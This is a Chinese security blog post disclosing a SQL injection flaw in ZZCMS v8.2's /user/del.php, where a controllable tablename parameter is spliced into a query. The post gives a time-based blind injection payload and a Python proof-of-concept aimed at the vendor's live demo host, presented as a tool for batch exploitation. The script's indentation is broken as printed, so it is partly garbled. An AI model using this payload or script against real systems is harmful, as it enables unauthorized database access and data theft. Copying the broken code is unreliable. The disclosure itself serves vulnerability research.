设置背景图片
模块透明度调整:
CMS漏洞之ZZCMS v8.2最新SQL注入漏洞
首页 > 渗透测试 作者:H0rk4 2018年2月9日 热度:526 字号: 评论: 1 百度未收录
时间:2018-2-9 21:00 热度:526°  评论:1 条 

CMS漏洞之ZZCMS v8.2最新SQL注入漏洞



时间概述



近期在一直都在审核CMS漏洞,连续数日,一无所获,甚是无聊,略有些许焦躁。



暮然回首,桌角横幅,挚友所赠,书:《戒急用忍》,回想四爷当年之景,于今日此情此景,不甚寂寥。稍有感慨,正值审至ZZCMS V8.2,现SQL注入漏洞。大喜。



1.白盒审计



运用白盒审计工具,发现隐于暗处之SQL注入漏洞:/user/del.php 



代码位置: /user/del.php 12行,获取参数。


由于存在checkid() 导致 $id无法进行注入,checkid() 代码如图。



代码位置:/inc/function.php  49行



在switch() 分支中不存在SQL注入就不展示代码了。在后面代码中 135行 发现存在SQL注入问题。




$tablename 可控,可以进行SQL注入。由于$tablename 所在位置无需闭合引号和CMS过滤大于号和小于号(转换为实体),拼接为 select id,editor, from zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)#where id in 1; 拼接成如此的SQL语句可以完成注入。



2.漏洞利用



测试payload:id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)%23



测试结果如图。


3.POC



用python完成POC进行批量漏洞利用,猜测用户名的第一个字符。


#!/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import time



payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串

url = "http://demo.zzcms.net/user/del.php"

user = ''

for i in range(1, 2):

        for payload in payloads:    #遍历取出字符

                startTime = time.time()

                post_data = "id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1))=" + str(ord(payload)) + "),sleep(5),1)%23".encode("utf-8")

                response = requests.post(url, timeout=6, data=post_data, headers={"Content-Type": "application/x-www-form-urlencoded"}  )

if time.time() - startTime > 5:

                        user = payload

print 'user is:', user

break

print '\n[Done] current user is %s' % user



至此,终结。缺少一些华丽的语坠,多了一些大家都想知道的技术干货,我觉着这样挺好~~

正文到此结束

热门推荐

二维码加载中...
版权声明:若无特殊注明,本文皆为《 H0rk4 》原创,转载请保留文章出处。
本文链接:CMS漏洞之ZZCMS v8.2最新SQL注入漏洞 http://www.8ohk.com/?post=56

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗

已有1条吐槽

匿名 沙发 2018-02-09 21:15

666 非常欧力给face
 未知操作系统   未知浏览器



本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除  

Copyright © 2017-2019  H0rk4's Blog - 致力关注于黑客技术、渗透测试、网络信息安全、1980黑客团队   站长: H0rk4  主题1980黑客团队   H0rk4